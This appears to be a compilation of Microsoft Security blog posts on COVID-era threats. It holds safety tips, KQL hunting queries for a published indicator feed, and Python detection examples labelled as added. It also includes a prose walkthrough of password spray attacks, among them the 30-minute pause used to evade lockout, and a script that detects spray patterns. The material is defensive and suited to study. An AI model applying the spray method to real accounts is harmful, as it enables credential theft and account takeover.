As we spend more time online, it’s important to remember that the basics of online safety have not changed. These guidelines provide a strong foundation for digital security, but as we think about the “new normal” and how the internet is woven into the fabric of our lives, extra steps may be necessary to further reduce risk.

So, in addition to the security policies implemented by your work or school, here are a few more practices we recommend you—and your family and friends—adopt to further increase personal cybersecurity resilience.

Keep devices secure and up to date

  1. Turn on automatic security updates, antivirus, and firewall. The reality of cyberthreats is that they often prey upon the devices that are the easiest to compromise: those without a firewall, without an antivirus service, or without the latest security updates. To reduce this risk, turn on automatic updates to ensure your devices have the latest security fixes, enable or install an antivirus solution that runs continuously, and configure a firewall. Modern computers have many of these features available and enabled by default, but it is a good idea to check all three are correctly set up.
  2. Don’t forget networking devices. Device safety includes your networking devices, too. As with computing devices, make sure that you check for and apply all updates for your networking devices. Many devices use default passwords, which means attackers have an easy list to try. Make sure to check your networking devices are not using default admin passwords or ones that are easily guessable (like your birthday). It’s also good hygiene to update your Wi-Fi credentials to strong passwords with a mix of upper- and lowercase letters as well as symbols and numbers.
  3. Use Wi-Fi encryption options for access. Wireless access points offer the ability to require passwords to gain access to the network. You should take advantage of this feature to ensure only authorized users are on your home network.

Secure your identity, guard your privacy

  1. Protect your digital identity. With more of our lives connected in the virtual realm, your digital identity becomes even more important to protect. Use strong passwords or, if possible, biometric authentication like your face or fingerprint, and wherever possible enable multi-factor authentication (MFA). Among others, Google and Microsoft both offer free MFA applications that are easy to set up and use.
  2. Keep your guard up in online chats and conferencing services. As we spend more time on virtual conferences and video calls, it is important to think about privacy. Consider these questions when trying new services:
    • Who can access or join the meeting/call?
    • Can it be recorded? If yes, do all participants know?
    • Are chats preserved and shared?
    • If there is file sharing, where are those files stored?
  3. Use background blur or images to obscure your location. One of the more popular features on video conferencing tools like Zoom, Skype, and Microsoft Teams is the ability to blur or change your background. This can be an important privacy step that you can take to maintain privacy between home and work environments.

Protect business data while at home

  1. Use the right file-sharing service for the right task. While working remotely, it’s easy for lines to blur between work and home. It’s important to ensure that your business data does not get mixed with your personal data. Remember to use business resources, like SharePoint or OneDrive for Business, to store and share content for work. Don’t use consumer offerings for business data while you are remote. Where possible, consider enabling Windows Information Protection to reduce the risk of unintentional (and intentional) enterprise data leakage via consumer services.
  2. Turn on device encryption. Device encryption ensures that data on your device is safe from unauthorized access should your device be stolen or lost.

Be aware of phishing and identity scams

Cybercriminals continue to exploit victims even through this global crisis. Based on what Microsoft has observed over the last two months, cybercriminals are utilizing new lures related to the coronavirus outbreak and are being indiscriminate in their targeting. As we move into this “new normal” of more virtual engagement, the same vigilance you kept at the office or classroom applies at home. Here are a couple of observed attack methods to keep top of mind:

  1. Identity compromise is still the number one point of entry. Attackers are looking to steal your digital identity for monetization, spam, and access. Be on the lookout for unexpected websites and applications asking you to sign in with your credentials. The same goes for MFA requests. If you did not initiate the request, do not verify it. Report suspected sites and uninitiated authentication requests through your browser or applications.
  2. Phishing is still out there. Be wary of offers that are too good to be true, that pressure you to act quickly, or that promise a free prize. These are the same bad guys from before, but now they’re using the outbreak and public fear to drive a different action. For more information on phishing attacks, read Protecting against coronavirus themed phishing attacks.
  3. Don’t fall victim to tech support scams. Tech support scams are an industry-wide issue where scammers use scare tactics to try and trick you into paying for unnecessary services that supposedly fix a device, operating system, or software problem. Please note that Microsoft will never contact you with an unsolicited offer to address a technical issue. And error and warning messages in Microsoft products never include a phone number to call. If you receive an unsolicited tech support call telling you there is something wrong with your computer—even if the caller offers to correct the issue for free—hang up and report the call to https://www.microsoft.com/reportascam. For more information on tech support scams, visit this page: https://support.microsoft.com/en-us/help/4013405/windows-protect-from-tech-support-scams.

With awareness and these few simple steps, you can better prepare yourself for this new world of secure remote work and social interaction. And as attackers evolve, we’ll be here to help you adapt and stay safe.

To learn more about Microsoft security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 11 security tips to help stay safe in the COVID-19 era appeared first on Microsoft Security.

Open-sourcing new COVID-19 threat intelligence

May 14th, 2020

A global threat requires a global response. While the world faces the common threat of COVID-19, defenders are working overtime to protect users all over the globe from cybercriminals using COVID-19 as a lure to mount attacks. As a security intelligence community, we are stronger when we share information that offers a more complete view of attackers’ shifting techniques. This more complete view enables us all to be more proactive in protecting, detecting, and defending against attacks.

At Microsoft, our security products provide built-in protections against these and other threats, and we’ve published detailed guidance to help organizations combat current threats (Responding to COVID-19 together). Our threat experts are sharing examples of malicious lures and we have enabled guided hunting of COVID-themed threats using Azure Sentinel Notebooks. Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack. Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. Microsoft Threat Protection (MTP) customers are already protected against the threats identified by these indicators across endpoints with Microsoft Defender Advanced Threat Protection (ATP) and email with Office 365 ATP.

In addition, we are publishing these indicators for those not protected by Microsoft Threat Protection to raise awareness of attackers’ shift in techniques, how to spot them, and how to enable your own custom hunting. These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.

This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.

This COVID-specific threat intelligence feed represents a start at sharing some of Microsoft’s COVID-related IOCs. We will continue to explore ways to improve the data over the duration of the crisis. While some threats and actors are still best defended more discreetly, we are committed to greater transparency and to taking community feedback on what types of information are most useful to defenders in protecting against COVID-related threats. This is a time-limited feed. We are maintaining this feed through the peak of the outbreak to help organizations focus on recovery.

Protection in Azure Sentinel and Microsoft Threat Protection

Today’s release includes file hash indicators related to email-based attachments identified as malicious and attempting to trick users with COVID-19 or Coronavirus-themed lures. The guidance below provides instructions on how to access and integrate this feed in your own environment.

For Azure Sentinel customers, these indicators can either be imported directly into Azure Sentinel using a Playbook or accessed directly from queries.

The Azure Sentinel Playbook that Microsoft has authored will continuously monitor and import these indicators directly into your Azure Sentinel ThreatIntelligenceIndicator table. This Playbook will match them with your event data and generate security incidents when the built-in threat intelligence analytic templates detect activity associated with these indicators.

These indicators can also be accessed directly from Azure Sentinel queries as follows:

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"));
covidIndicators

Azure Sentinel logs.

A sample detection query is also provided in the Azure Sentinel GitHub. With the table definition above, it is as simple as:

  1. Join the indicators against the logs ingested into Azure Sentinel as follows:

covidIndicators
| join ( CommonSecurityLog | where TimeGenerated >= ago(7d)
| where isnotempty(FileHash)
) on $left.FileHashValue == $right.FileHash

  2. Then, select “New alert rule” to configure Azure Sentinel to raise incidents based on this query returning results.

CyberSecurityDemo in Azure Sentinel logs.

You should begin to see Alerts in Azure Sentinel for any detections related to these COVID threat indicators.

Microsoft Threat Protection provides protection for the threats associated with these indicators. Attacks with these Covid-19-themed indicators are blocked by Office 365 ATP and Microsoft Defender ATP.

While MTP customers are already protected, they can also make use of these indicators for additional hunting scenarios using the MTP Advanced Hunting capabilities.

Here is a hunting query to see if any process created a file matching a hash on the list.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType == 'FileCreated'
| take 100) on $left.FileHashValue  == $right.SHA256

Advanced hunting in Microsoft Defender Security Center.

This is an Advanced Hunting query in MTP that searches for any recipient of an attachment on the indicator list and sees if any recent anomalous log-ons happened on their machine. While COVID threats are blocked by MTP, users targeted by these threats may be at risk for non-COVID related attacks and MTP is able to join data across device and email to investigate them.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join ( EmailAttachmentInfo | where Timestamp > ago(1d)
| project NetworkMessageId, SHA256
) on $left.FileHashValue == $right.SHA256
| join (
EmailEvents
| where Timestamp > ago(1d)
) on NetworkMessageId
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
| join (
DeviceLogonEvents
| project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min .. 90min)
| take 10

Advanced hunting in Microsoft 365 security.
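The three hunting queries above (the hash-type and lookback filter on the feed, the attachment hash join, and the email-to-logon correlation) re-implemented offline in Python, as an added example rather than Microsoft's code. The feed sample keeps the CSV's column layout but its hashes, messages, accounts and devices are all constructed; the 1-day lookback and the 0–90 minute logon window follow the queries.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed dummy hashes (real SHA-256 / MD5 values are 64 / 32 hex characters).
SHA_A = "a" * 64   # recent sha256 indicator -> should match
SHA_C = "c" * 64   # sha256 indicator older than the lookback -> ignored
MD5_B = "b" * 32   # md5 entry -> filtered out by hash type

# Constructed sample with the same columns as Microsoft.Covid19.Indicators.csv
FEED_CSV = f"""TimeGenerated,FileHashValue,FileHashType
2020-05-13T10:00:00Z,{SHA_A},sha256
2020-05-13T10:05:00Z,{MD5_B},md5
2020-05-10T09:00:00Z,{SHA_C},sha256
"""


def parse_ts(value):
    """Parse the feed's ISO-8601 UTC timestamps into naive UTC datetimes."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def load_indicators(csv_text, hash_type="sha256", since=None):
    """Equivalent of `where FileHashType == 'sha256' and TimeGenerated > ago(1d)`:
    return the set of lower-cased hash values that pass both tests."""
    hashes = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["FileHashType"].lower() != hash_type:
            continue
        if since is not None and parse_ts(row["TimeGenerated"]) <= since:
            continue
        hashes.add(row["FileHashValue"].strip().lower())
    return hashes


def correlate(indicators, attachments, emails, logons, window=timedelta(minutes=90)):
    """Mirror of the three-way join: attachment hash on the list -> recipient
    account (local part of the address) -> device logons for that account
    between 0 and `window` after the email was received."""
    flagged_msgs = {a["NetworkMessageId"] for a in attachments
                    if a["SHA256"].lower() in indicators}
    hits = []
    for mail in emails:
        if mail["NetworkMessageId"] not in flagged_msgs:
            continue
        account = mail["RecipientEmailAddress"].split("@")[0]
        t_email = mail["Timestamp"]
        for logon in logons:
            if logon["AccountName"] != account:
                continue
            delta = logon["Timestamp"] - t_email
            if timedelta(0) <= delta <= window:
                hits.append({"account": account, "device": logon["DeviceName"],
                             "subject": mail["Subject"], "sender": mail["SenderFromAddress"],
                             "email_time": t_email, "logon_time": logon["Timestamp"]})
    return hits


def run_example():
    """Run the correlation over constructed events and return the hits."""
    now = parse_ts("2020-05-14T00:00:00Z")   # fixed 'now' keeps the example deterministic
    indicators = load_indicators(FEED_CSV, since=now - timedelta(days=1))
    t0 = parse_ts("2020-05-13T12:00:00Z")
    attachments = [
        {"NetworkMessageId": "msg-1", "SHA256": SHA_A},  # on the filtered list
        {"NetworkMessageId": "msg-2", "SHA256": SHA_C},  # too old to be in the filtered list
    ]
    emails = [
        {"NetworkMessageId": "msg-1", "Timestamp": t0, "Subject": "COVID-19 SAFETY TIPS",
         "SenderFromAddress": "alerts@redcross-lookalike.test",
         "RecipientEmailAddress": "alice@contoso.example"},
        {"NetworkMessageId": "msg-2", "Timestamp": t0, "Subject": "Relief plan",
         "SenderFromAddress": "info@who-lookalike.test",
         "RecipientEmailAddress": "bob@contoso.example"},
    ]
    logons = [
        {"AccountName": "alice", "DeviceName": "DEV-01", "Timestamp": t0 + timedelta(minutes=30)},   # in window
        {"AccountName": "alice", "DeviceName": "DEV-02", "Timestamp": t0 - timedelta(minutes=10)},   # before delivery
        {"AccountName": "alice", "DeviceName": "DEV-03", "Timestamp": t0 + timedelta(minutes=120)},  # past 90 minutes
        {"AccountName": "bob",   "DeviceName": "DEV-04", "Timestamp": t0 + timedelta(minutes=15)},   # hash not flagged
    ]
    return correlate(indicators, attachments, emails, logons)


if __name__ == "__main__":
    for hit in run_example():
        minutes = int((hit["logon_time"] - hit["email_time"]).total_seconds() // 60)
        print(f"{hit['account']} logged on to {hit['device']} {minutes} min after "
              f"receiving '{hit['subject']}' from {hit['sender']}")
```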

Connecting a MISP instance to Azure Sentinel

The indicators published on the Azure Sentinel GitHub page can be consumed directly via MISP’s feed functionality. We have published details on doing this at this URL: https://aka.ms/msft-covid19-misp. Please refer to the Azure Sentinel documentation on connecting data from threat intelligence providers.

Using the indicators if you are not an Azure Sentinel or MTP customer

The Azure Sentinel GitHub is public: https://aka.ms/msft-covid19-Indicators

Examples of phishing campaigns in this threat intelligence

The following is a small sample set of the types of COVID-themed phishing lures using email attachments that will be represented in this feed. Beneath each screenshot are the relevant hashes and metadata.

Figure 1: Spoofing WHO branding with “cure” and “vaccine” messaging with a malicious .gz file.

Name: CURE FOR CORONAVIRUS_pdf.gz

World Health Organization phishing email.

Figure 2: Spoofing Red Cross Safety Tips with malicious .docm file.

Name: COVID-19 SAFETY TIPS.docm

Red Cross phishing email.

Figure 3: South African banking lure promoting COVID-19 financial relief with malicious .html files.

Name: SBSA-COVID-19-Financial Relief.html

Financial relief phishing email.

Figure 4: French language spoofed correspondence from the WHO with malicious XLS Macro file.

Name: ✉-Covid-19 Relief Plan5558-23636sd.htm

Coronavirus-themed phishing email.

If you have questions or feedback on this COVID-19 feed, please email msft-covid19-ti@microsoft.com.

The post Open-sourcing new COVID-19 threat intelligence appeared first on Microsoft Security.

Protecting your organization against password spray attacks

April 23rd, 2020

When hackers plan an attack, they often engage in a numbers game. They can invest significant time pursuing a single, high-value target, someone in the C-suite for example, in what is called “spear phishing.” Or, if they just need low-level access to gain a foothold in an organization or do reconnaissance, they can target a huge volume of people and spend less time on each one, which is called “password spray.” Last December, Seema Kathuria and I described an example of the first approach in Spear phishing campaigns—they’re sharper than you think! Today, I want to talk about a high-volume tactic: password spray.

In a password spray attack, adversaries “spray” passwords at a large volume of usernames. When I talk to security professionals in the field, I often compare password spray to a brute force attack. Brute force is targeted. The hacker goes after specific users and cycles through as many passwords as possible using either a full dictionary or one that’s edited to common passwords. An even more targeted password guessing attack is when the hacker selects a person and conducts research to see if they can guess the user’s password—discovering family names through social media posts, for example. And then trying those variants against an account to gain access. Password spray is the opposite. Adversaries acquire a list of accounts and attempt to sign into all of them using a small subset of the most popular, or most likely, passwords. Until they get a hit. This blog describes the steps adversaries use to conduct these attacks and how you can reduce the risk to your organization.

Three steps to a successful password spray attack

Step 1: Acquire a list of usernames

It starts with a list of accounts. This is easier than it sounds. Most organizations have a formal convention for emails, such as firstname.lastname@company.com. This allows adversaries to construct usernames from a list of employees. If the bad actor has already compromised an account, they may try to enumerate usernames against the domain controller. Or, they find or buy usernames online. Data can be compiled from past security breaches, online profiles, etc. The adversary might even get some verified profiles for free!

Step 2: Spray passwords

Finding a list of common passwords is even easier. A Bing search reveals that publications list the most common passwords each year. 123456, password, and qwerty are typically near the top. Wikipedia lists the top 10,000 passwords. There are regional differences that may be harder to discover, but many people use a favorite sports team, their state, or their company as a password. For example, Seahawks is a popular password choice in the Seattle area. Once hackers do their research, they carefully select a password and try it against the entire list of accounts, as shown in Figure 1. If the attack is not successful, they wait 30 minutes to avoid triggering a timeout, and then try the next password.


Figure 1:  Password spray using one password across multiple accounts.

Step 3: Gain access

Eventually one of the passwords works against one of the accounts. And that’s what makes password spray a popular tactic—attackers only need one successful password + username combination. Once they have it, they can access whatever the user has access to, such as cloud resources on OneDrive. Or use the exploited account to do internal reconnaissance on the target network and get deeper into the systems via elevation of privilege.

Even if the vast majority of your employees don’t use popular passwords, there is a risk that hackers will find the ones that do. The trick is to reduce the number of guessable passwords used at your organization.
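An added example, not from the post and not a Microsoft tool, showing why the pattern described in the three steps is still visible to defenders even when per-account lockout never trips: failed sign-ins from one source spread thinly across many accounts look different from a brute-force burst against one account, and a failure followed by a success from a spray source marks the guess that worked. The sign-in records, account names and source addresses are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def make_events():
    """Constructed sign-in log as (time, account, source_ip, success) tuples.
    Account names are invented and the source IPs come from the RFC 5737
    documentation ranges, so nothing here refers to a real host."""
    accounts = ["jdoe", "asmith", "bwong", "cpatel", "dlee", "efox", "gkim", "hsmith"]
    events = []
    # Spray source: one guess per account, then a second round 30 minutes later
    # (the pause the post describes, timed to stay under per-account lockout).
    for start in ("2020-04-20 12:00:00", "2020-04-20 12:30:00"):
        base = parse_ts(start)
        for i, acct in enumerate(accounts):
            events.append((base + timedelta(seconds=i), acct, "203.0.113.10", False))
    # Third round: the guess works for one account (Step 3, gaining access).
    events.append((parse_ts("2020-04-20 13:00:00"), "hsmith", "203.0.113.10", True))
    # Brute-force source: many guesses against a single high-value account.
    base = parse_ts("2020-04-20 12:10:00")
    for i in range(12):
        events.append((base + timedelta(seconds=10 * i), "ceo", "198.51.100.7", False))
    # Ordinary user: two mistyped passwords, then a successful sign-in.
    base = parse_ts("2020-04-20 12:05:00")
    events += [(base, "jdoe", "192.0.2.5", False),
               (base + timedelta(seconds=20), "jdoe", "192.0.2.5", False),
               (base + timedelta(seconds=40), "jdoe", "192.0.2.5", True)]
    return sorted(events, key=lambda e: e[0])


def classify_sources(events, min_accounts=5, max_avg_failures=3.0, min_single_account=10):
    """Label each source IP by the shape of its failed sign-ins.

    spray:       failures spread over >= min_accounts distinct accounts with a low
                 average per account (one password tried against many users);
    brute_force: >= min_single_account failures against one account (many
                 passwords tried against one user);
    normal:      anything else.
    For flagged sources, possible_hits lists accounts that both failed and
    succeeded from that source, i.e. where a guess appears to have worked."""
    failures = defaultdict(lambda: defaultdict(int))  # source -> account -> failed count
    successes = defaultdict(set)                       # source -> accounts with a success
    for _, acct, src, ok in events:
        if ok:
            successes[src].add(acct)
        else:
            failures[src][acct] += 1
    report = {}
    for src, per_acct in failures.items():
        total = sum(per_acct.values())
        distinct = len(per_acct)
        if distinct >= min_accounts and total / distinct <= max_avg_failures:
            verdict = "spray"
        elif max(per_acct.values()) >= min_single_account:
            verdict = "brute_force"
        else:
            verdict = "normal"
        hits = sorted(successes[src] & set(per_acct)) if verdict != "normal" else []
        report[src] = {"verdict": verdict, "failures": total,
                       "accounts": distinct, "possible_hits": hits}
    return report


if __name__ == "__main__":
    for src, info in classify_sources(make_events()).items():
        print(f"{src}: {info['verdict']} ({info['failures']} failures across "
              f"{info['accounts']} accounts), possible hits: {info['possible_hits']}")
```

Note that the spray source never exceeds two failures for any one account, so a lockout threshold alone would not have caught it; counting distinct accounts per source is what separates it from the ordinary user.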

Configure Azure Active Directory (Azure AD) Password Protection

Azure AD Password Protection allows you to eliminate easily guessed passwords and customize lockout settings for your environment. This capability includes a globally banned password list that Microsoft maintains and updates. You can also block a custom list of passwords that are relevant to your region or company. Once enabled, users won’t be able to choose a password on either of these lists, making it significantly less likely that an adversary can guess a user’s password. You can also use this feature to define how many sign-in attempts will trigger a lockout and how long the lockout will last.

Simulate attacks with Office 365 Advanced Threat Protection (Office 365 ATP)

Attack Simulator in Office 365 ATP lets you run realistic, but simulated phishing and password attack campaigns in your organization. Pick a password and then run the campaign against as many users as you want. The results will let you know how many people are using that password. Use the data to train users and build your custom list of banned passwords.

Begin your passwordless journey

The best way to reduce your risk of password spray is to eliminate passwords entirely. Solutions like Windows Hello or FIDO2 security keys let users sign in using biometrics and/or a physical key or device. Get started by enabling Multi-Factor Authentication (MFA) across all your accounts. MFA requires that users sign in with at least two authentication factors: something they know (like a password or PIN), something they are (such as biometrics), and/or something they have (such as a trusted device).

Learn more

We make progress in cybersecurity by increasing how much it costs the adversary to conduct the attack. If we make guessing passwords too hard, hackers will reduce their reliance on password spray.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. For more information about our security solutions visit our website. Or reach out to me on LinkedIn or Twitter.

The post Protecting your organization against password spray attacks appeared first on Microsoft Security.

Microsoft shares new threat intelligence, security guidance during global crisis

April 8th, 2020

Ready or not, much of the world was thrust into working from home, which means more people and devices are now accessing sensitive corporate data across home networks. Defenders are working round the clock to secure endpoints and ensure the fidelity of not only those endpoints, but also identities, email, and applications, as people are using whatever device they need to get work done. This isn’t something anyone, including our security professionals, was given time to prepare for, yet many customers have been thrust into a new environment and challenged to respond quickly. Microsoft is here to help lighten the load on defenders, offer guidance on what to prioritize to keep your workforce secure, and share resources about the built-in protections of our products.

Attackers are capitalizing on fear. We’re watching them. We’re pushing back.

Our inboxes, mobile alerts, TVs, and news updates are all COVID-19, all the time. It’s overwhelming and attackers know it. They know many are clicking without looking because stress levels are high and they’re taking advantage of that. That’s why we’re seeing an increase in the success of phishing and social engineering attacks. Attackers don’t suddenly have more resources they’re diverting towards tricking users; instead they’re pivoting their existing infrastructure, like ransomware, phishing, and other malware delivery tools, to include COVID-19 keywords that get us to click. Once we click, they can infiltrate our inboxes, steal our credentials, share more malicious links with coworkers across collaboration tools, and lie in wait to steal information that will give them the biggest payout. This is where intelligent solutions that can monitor for malicious activity across – that’s the key word – emails, identities, endpoints, and applications with built-in automation to proactively protect, detect, respond to, and prevent these types of attacks from being successful will help us fight this battle against opportunistic attackers.

Our threat intelligence teams at Microsoft are actively monitoring and responding to this shift in focus. Our data shows that these COVID-19 themed threats are retreads of existing attacks that have been slightly altered to tie to this pandemic. This means we’re seeing a changing of lures, not a surge in attacks. Our intelligence shows that these attacks are settling into a rhythm that is the normal ebb and flow of the threat environment:

  • Every country in the world has seen at least one COVID-19 themed attack (see map below). The volume of successful attacks in outbreak-hit countries is increasing, as fear and the desire for information grows. Our telemetry shows that China, the United States, and Russia have been hit the hardest.
  • The trendy and pervasive Trickbot and Emotet malware families are very active and rebranding their lures to take advantage of the outbreak. We have observed 76 threat variants to date globally using COVID-19 themed lures (map below).
  • Microsoft tracks thousands of email phishing campaigns that cover millions of malicious messages every week. Phishing campaigns are more than just one targeted email at one targeted user. They include potentially hundreds or thousands of malicious emails targeting hundreds or thousands of users, which is why they can be so effective. Of the millions of targeted messages we see each day, roughly 60,000 include COVID-19 related malicious attachments or malicious URLs.
  • While that number sounds very large, it’s important to note that this is less than two percent of the total volume of threats we actively track and protect against daily, which reinforces that the overall volume of threats is not increasing but attackers are shifting their techniques to capitalize on fear. Attackers are impersonating established entities like the World Health Organization (WHO), Centers for Disease Control and Prevention (CDC), and the Department of Health to get into inboxes. Here’s an example of what just one of these malicious emails looks like now compared to before the COVID-19 crisis:

Comparison of malicious emails used in malware campaigns before the crisis and during

  • In a single day, SmartScreen sees and processes more than 18,000 malicious COVID-19-themed URLs and IP addresses. This again shows us that attackers are getting more aggressive and agile in the delivery of their attacks – using the same delivery methods, but swapping out the malicious URLs on a more frequent basis in an effort to evade machine learning protections.
  • Microsoft Office 365 Advanced Threat Protection prevented a big phishing campaign that used a fake Office 365 sign-in page to capture credentials. Roughly 2,300 unique HTML attachments posing as COVID-19 financial compensation information were caught in 24 hours in this one campaign. We expect to see more campaigns that utilize the economic fear from lost income, as governments widen the mandatory shutdown of their economies and stimulus funds begin to be issued in the U.S.
  • Several advanced persistent threat and nation-state actors have been observed targeting healthcare organizations and using COVID-19-themed lures in their campaigns. We continue to identify, track, and build proactive protections against these threats in all of our security products. When customers are affected by these attacks, Microsoft notifies the customer directly to help speed up investigations. We also report malicious COVID-19-themed domains and URLs to the proper authorities so that they can be taken down, and where possible, the individuals behind them prosecuted.

Map showing global impact of COVID-19-themed-attacks

Relative impact of COVID-19 themed attacks across the world by file count (as of April 7, 2020)

From endpoints and identities to the cloud, we have you covered

While phishing email is a common attack vector, it’s only one of the many points of entry for attackers. Defenders need a much broader view and solutions for remediation than visibility into just one entry method. An attacker’s primary goal is to gain entry and expand across domains so they can persist in an organization and lie in wait to steal or encrypt as much sensitive information as they can to reap the biggest payout. Defenders require visibility across each of these domains and automated correlation across emails, identities, endpoints, and cloud applications to see the full scope of compromise. Only with this view can defenders adequately remediate affected assets, apply Conditional Access, and prevent the same or similar attacks from being successful again.

During this trying time, we want to remind our customers what protections you have built into our products and offer guidance for what to prioritize:

  • Protect endpoints with Microsoft Defender ATP, which covers licensed users for up to five concurrent devices that can be easily onboarded at any time. Microsoft Defender ATP monitors threats from across platforms, including macOS. Our tech community post includes additional guidance, best practices, onboarding, and licensing information.
  • Enable multi-factor authentication (MFA) and Conditional Access through Azure Active Directory to protect identities. This is more important than ever to mitigate credential compromise as users work from home. We recommend connecting all apps to Azure AD for single sign-on – from SaaS to on-premises apps; enabling MFA and applying Conditional Access policies; and extending secure access to contractors and partners. Microsoft also offers a free Azure AD service for single sign-on, including MFA using the Microsoft Authenticator app.
  • Safeguard inboxes and email accounts with Office 365 ATP, Microsoft’s cloud-based email filtering service, which shields against phishing and malware, including features to safeguard your organization from messaging-policy violations, targeted attacks, zero-days, and malicious URLs. Intelligent recommendations from Security Policy Advisor can help reduce macro attack surface, and the Office Cloud Policy Service can help you implement security baselines.
  • Microsoft Cloud App Security can help protect against shadow IT and unsanctioned app usage, identify and remediate cloud-native attacks, and control how data travels across cloud apps from Microsoft or third-party applications.

Microsoft Threat Protection correlates signals from across each of these domains using Azure ATP, Microsoft Defender ATP, Office 365 ATP, and Microsoft Cloud App Security, to understand the entire attack chain to help defenders prioritize which threats are most critical to address and to auto-heal affected user identities, email inboxes, endpoints, and cloud apps back to a safe state. Our threat intelligence combines signals from not just one attack vector like email phishing, but from across emails, identities, endpoints, and cloud apps to understand how the threat landscape is changing and build that intelligence into our products to prevent attack sprawl and persistence. The built-in, automated remediation capabilities across these solutions can also help reduce the manual workload on defenders that comes from the multitude of new devices and connections.

Azure Sentinel is a cloud-native SIEM that brings together insights from Microsoft Threat Protection and Azure Security Center, along with the whole world of third-party and custom application logs to help security teams gain visibility, triage, and investigate threats across their enterprise. As with all Microsoft Security products, Azure Sentinel customers benefit from Microsoft threat intelligence to detect and hunt for attacks. Azure Sentinel makes it easy to add new data sources and scale existing ones with built-in workbooks, hunting queries, and analytics to help teams identify, prioritize, and respond to threats. We recently shared a threat hunting notebook developed to hunt for COVID-19 related threats in Azure Sentinel.

Cloud-delivered protections are a critical part of staying up to date with the latest security updates and patches. If you don’t already have them turned on, we highly recommend it. We also offer advanced hunting through both Microsoft Threat Protection and Azure Sentinel.

We’ll keep sharing and protecting – stay tuned, stay safe

Remember that we at Microsoft are 3,500 defenders strong. We’re very actively monitoring the threat landscape, and we’re here to help: we’re providing resources and guidance, and for dire cases we have support available from services like the Microsoft Detection and Response Team (DART) to help investigate and remediate.

All of our guidance related to COVID-19 is and will be posted here. We will continue to share updates across channels to keep you informed. Please stay safe, stay connected, stay informed.

THANK YOU to our defenders who are working tirelessly to keep us secure and connected during this pandemic.

-Rob and all of us from across Microsoft security

To stay up to date with verified information on the COVID-19 crisis, the following sites are available:

The post Microsoft shares new threat intelligence, security guidance during global crisis appeared first on Microsoft Security.

Full Operational Shutdown—another cybercrime case from the Microsoft Detection and Response Team

April 2nd, 2020

Recently, we published our first case report (001: …And Then There Were Six) by the Microsoft Detection and Response Team (DART). We received significant positive response from our customers and colleagues and our team has been getting inquiries asking for more reports. We are glad to share the DART Case Report 002: Full Operational Shutdown.

In report 002, we cover an actual incident response engagement where polymorphic malware spread through the entire network of an organization. After a phishing email delivered Emotet, a polymorphic virus that propagates via network shares and legacy protocols, the virus shut down the organization’s core services. It avoided detection by antivirus solutions through regular updates from attacker-controlled command-and-control (C2) infrastructure, and it spread through the company’s systems, causing network outages and shutting down essential services for nearly a week. In our report, you can read the details of the attack and how DART responded, review the attack lateral progression diagram, and learn best practices from DART experts.

Stay tuned for more DART case reports where you’ll find unique stories from our team’s engagements around the globe. As always, you can reach out to your Microsoft account manager or Premier Support contact for more information on DART services.

DART provides the most complete and thorough investigations by leveraging a combination of proprietary tools and Microsoft Security products, close connections with internal Microsoft threat intelligence and product groups, as well as strategic partnerships with security organizations around the world.

The post Full Operational Shutdown—another cybercrime case from the Microsoft Detection and Response Team appeared first on Microsoft Security.

Protecting against coronavirus themed phishing attacks

March 20th, 2020 No comments

The world has changed in unprecedented ways in the last several weeks due to the coronavirus pandemic. While it has brought out the best in humanity in many ways, as with any crisis it can also attract the worst in some. Cybercriminals use people’s fear and need for information in phishing attacks to steal sensitive information or spread malware for profit. Even as some criminal groups claim they’ll stop attacking healthcare and nursing homes, the reality is they can’t fully control how malware spreads.

While phishing and other email attacks are indeed happening, the volume of malicious emails mentioning the coronavirus is very small. Still, customers are asking us what Microsoft is doing to help protect them from these types of attacks, and what they can do to better protect themselves. We thought this would be a useful time to recap how our automated detection and signal-sharing works to protect customers (with a specific recent example) as well as share some best practices you can use personally to stay safe from phishing attempts.

What Microsoft is doing

First, 91 percent of all cyberattacks start with email. That’s why the first line of defense is doing everything we can to block malicious emails from reaching you in the first place. A multi-layered defense system that includes machine learning, detonation, and signal-sharing is key in our ability to quickly find and shut down email attacks.

If any of these mechanisms detect a malicious email, URL, or attachment, the message is blocked and does not make its way to your inbox. All attachments and links are detonated (opened in isolated virtual machines). Machine learning, anomaly analyzers, and heuristics are used to detect malicious behavior. Human security analysts continuously evaluate user-submitted reports of suspicious mail to provide additional insights and train machine learning models.

